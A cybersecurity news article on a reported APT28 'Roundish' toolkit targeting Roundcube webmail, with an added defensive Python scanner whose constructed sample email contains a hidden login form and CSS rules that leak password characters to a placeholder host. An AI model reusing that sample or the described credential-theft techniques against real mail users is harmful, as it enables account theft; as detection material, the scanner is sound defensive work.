Open directory
Cybersecurity investigators at Hunt Intelligence have discovered an exposed open directory that unmasks the inner workings of one of the world’s most notorious threat actors. The find provides a rare, unfiltered look into a complete exploitation toolkit dubbed “Roundish,” attributed with high confidence to APT28 (also known as Fancy Bear), the military intelligence arm of Russia’s GRU.
In January 2026, researchers identified an open directory on a server hosted in Arizona that contained everything an operative needs for a high-stakes espionage campaign. From Flask-based command-and-control (C2) servers to operator bash histories, the directory exposed the group’s “development and production XSS payloads” and a “Go-based implant” used for long-term persistence.
As the report notes: “The recovered files provide visibility into how this toolkit was built, tested, and deployed.”
The Roundish toolkit is surgically designed to compromise Roundcube, a widely used webmail platform. Once a victim opens a malicious email, the toolkit executes six operations simultaneously, ranging from bulk email theft to the extraction of two-factor authentication (2FA) secrets.
One of the most distinctive techniques involves a high-tech “sleight of hand” to steal passwords. The toolkit injects invisible username and password fields into the victim’s browser, then captures whatever the browser’s password manager auto-fills.
While APT28 is a known quantity, Roundish introduces several “previously unknown additions” to their public playbook.
- CSS Side-Channel Attacks: Using a dedicated Node.js server, the group can “progressively extract characters from Roundcube’s DOM” without needing to inject a single line of JavaScript into the page.
- Browser Credential Stealers: The toolkit has expanded beyond webmail to target Chrome and Firefox credentials directly.
- The “httd” Linux Implant: A sophisticated 5.2 MB Go-based binary that provides persistence on everything from standard Linux to advanced SELinux-enforcing systems.
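An added defender-side example, not part of the Hunt report or of the Roundish toolkit itself: a small Python scanner that flags the two patterns described above in an inbound HTML email body, hidden credential fields that a password manager might auto-fill, and CSS attribute-selector rules that point at remote `url()` resources, which is the shape a character-by-character CSS extraction takes. The sample email body is constructed for the example and the host `example.invalid` is a placeholder.

```python
import re
from html.parser import HTMLParser

# Constructed sample (not from the report): an off-screen credential form plus
# CSS rules that request a remote image depending on the password field's value.
SAMPLE_EMAIL_HTML = """
<html><body>
<p>Quarterly report attached.</p>
<form style="position:absolute;left:-9999px">
  <input type="text" name="username">
  <input type="password" name="password">
</form>
<style>
  input[name="password"][value^="a"] { background: url(https://example.invalid/a) }
  input[name="password"][value^="ab"] { background: url(https://example.invalid/ab) }
</style>
</body></html>
"""

# Inline styles that make an element invisible to the user but still present in the DOM.
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|opacity\s*:\s*0(?![.\d])|left\s*:\s*-\d{3,}px", re.I)
# A selector keyed on an input's value prefix/substring whose rule body fetches a url().
CSS_EXFIL_RULE = re.compile(r"\[\s*value\s*[\^*$]?=[^\]]*\][^{]*\{[^}]*url\s*\(", re.I)
CREDENTIAL_NAMES = {"username", "user", "login", "email", "password"}

class CredentialFieldFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hidden_inputs, self.css = [], []
        self.form_hidden = self.in_style = False
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form_hidden = bool(HIDDEN_STYLE.search(a.get("style") or ""))
        elif tag == "input":
            sensitive = (a.get("type") or "").lower() == "password" or (a.get("name") or "").lower() in CREDENTIAL_NAMES
            hidden = self.form_hidden or bool(HIDDEN_STYLE.search(a.get("style") or ""))
            if sensitive and hidden:
                self.hidden_inputs.append(a.get("name") or "?")
        elif tag == "style":
            self.in_style = True
    def handle_endtag(self, tag):
        if tag == "form": self.form_hidden = False
        if tag == "style": self.in_style = False
    def handle_data(self, data):
        if self.in_style: self.css.append(data)  # raw <style> text is delivered here

def scan_email_html(html):
    """Return the hidden credential inputs and the count of CSS exfiltration-style rules."""
    p = CredentialFieldFinder()
    p.feed(html)
    return {"hidden_credential_inputs": p.hidden_inputs,
            "css_exfil_rules": len(CSS_EXFIL_RULE.findall("\n".join(p.css)))}
```

Either finding in an inbound message is a strong signal for quarantine, since legitimate mail has no reason to carry invisible login fields or value-dependent CSS rules.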
“This level of containerization awareness indicates the operator regularly encounters Docker and Kubernetes environments,” the report states.
The evidence found on the server wasn’t just theoretical; it contained direct proof of active operations. Analysts identified significant targeting of the Ukrainian State Migration Service (DMSU). The operator’s bash history showed them running reconnaissance commands against the agency’s mail server and even exfiltrating a “42 MB multi-page scanned document” likely stolen from a victim organization.
The Roundish discovery proves that APT28 remains a highly adaptable and dangerous cluster. By using “purpose-built operational identities” like the advenwolf@proton.me dead drop for stolen data, they ensure their exfiltration traffic remains “indistinguishable from legitimate email forwarding”.